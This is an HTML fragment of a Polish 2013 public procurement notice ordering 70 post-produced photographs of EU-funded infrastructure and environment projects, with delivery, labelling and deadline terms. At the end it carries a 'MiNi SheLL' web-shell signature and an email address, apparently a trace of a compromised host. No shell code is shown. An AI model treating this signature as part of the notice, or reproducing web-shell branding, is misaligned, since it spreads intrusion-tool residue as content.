<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> projekty realizowane w ramach II Priorytetu PO IiŚ (projekt poligonowy).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem niniejszego zamówienia jest wykonanie i przeniesienie majątkowych praw autorskich do 70 zdjęć wraz z ich postprodukcją, wykonanych w 7 lokalizacjach skazanych w załączniku nr 1 do SIWZ - Szczegółowy opis przedmiotu zamówienia; 2. Sesje zdjęciowe mają na celu prezentację rezultatów projektów realizowanych w ramach II, III Priorytetu Programu Operacyjnego Infrastruktura i Środowisko. 3. Zamawiający wybierze 10 najlepszych fotografii z każdej sesji, w pełnym kolorze, z puli co najmniej 100 zdjęć dla każdej sesji. 
Wybrane przez Zamawiającego zdjęcia trafią do postprodukcji wykonywanej przez fotografa. 4. Wszystkie wybrane  fotografie będą poddane postprodukcji i zostaną dostarczone do siedziby Zamawiającego na płycie CD, zapisane  w rozdzielczości 300 dpi, formacie A3, w plikach o rozszerzeniu JPG. Każda część zamówienia dostarczana jest na jednej płycie, w której zdjęcia są pogrupowane w katalogach opatrzonych nazwą instytucji. 5. Zamawiający zakupi wybrane i poddane obróbce graficznej zdjęcia w ramach umowy zakładającej przeniesienie majątkowych praw autorskich na instytucję Zamawiającą. WARUNKI REALIZACJI ZAMÓWIENIA 6. Wykonawca ustala termin realizacji konkretnych sesji, w ramach terminu, o którym mowa w pkt. 3, w uzgodnieniu z przedstawicielem danej instytucji. 7. Wykonawca odpowiada za uzyskania wymaganych prawem zgód w celu wykonania zamówienia, zebranie od uczestników sesji zdjęciowej podpisanych formularzy zgody na wykorzystywanie wizerunku przez CKPŚ (w przypadku gdy fotografowany jest zespół/pracownik danej instytucji).
8. Koszty transportu na miejsce sesji, przemieszczanie się w danej lokalizacji, noclegu, wyżywienia oraz kontaktu z partnerami realizującymi projekty 
w danych lokalizacjach ponosi Wykonawca. 9. Wykonawca po wykonaniu danej sesji przesyła pulę 100 zdjęć z każdej sesji do wyboru w ciągu 4 dni roboczych od daty zakończenia danej sesji zdjęciowej. 10. Zamawiający zobowiązany jest do przekazania Wykonawcy informacji o wyborze zdjęć z każdej sesji do postprodukcji w terminie 2 dni roboczych od momentu ich otrzymania. 11. Wykonawca przysyła drogą pocztową, na płycie CD/DVD, zdjęcia  o odpowiednich parametrach i formatach, poddane post produkcji, w ciągu 10  dni roboczych od dnia dokonania wyboru przez Zamawiającego. Każda część zamówienia dostarczana jest na jednej płycie,  w której zdjęcia są pogrupowane w katalogach opatrzonych nazwą instytucji/ beneficjenta z zastrzeżeniem obowiązku dotrzymania terminu do 15 lipca 2013 r. 12. Płyta i okładka płyty CD/DVD powinna zawierać następujące oznaczenia i informacje: a) Wpisany numer i nazwa części zamówienia; b) Wykaz nazw instytucji realizujących działanie będące przedmiotem sesji zdjęciowej w danej części zamówienia c) ciąg logotypów: PO IiŚ,  CKPŚ, UE/ FS d) Informację o współfinansowaniu:  Sesje zdjęciowe zostały współfinansowane przez Unię Europejską ze środków Funduszu Spójności w ramach Programu Operacyjnego Infrastruktura i Środowisko. e) Hasło: Dla rozwoju infrastruktury i środowiska..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.96.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com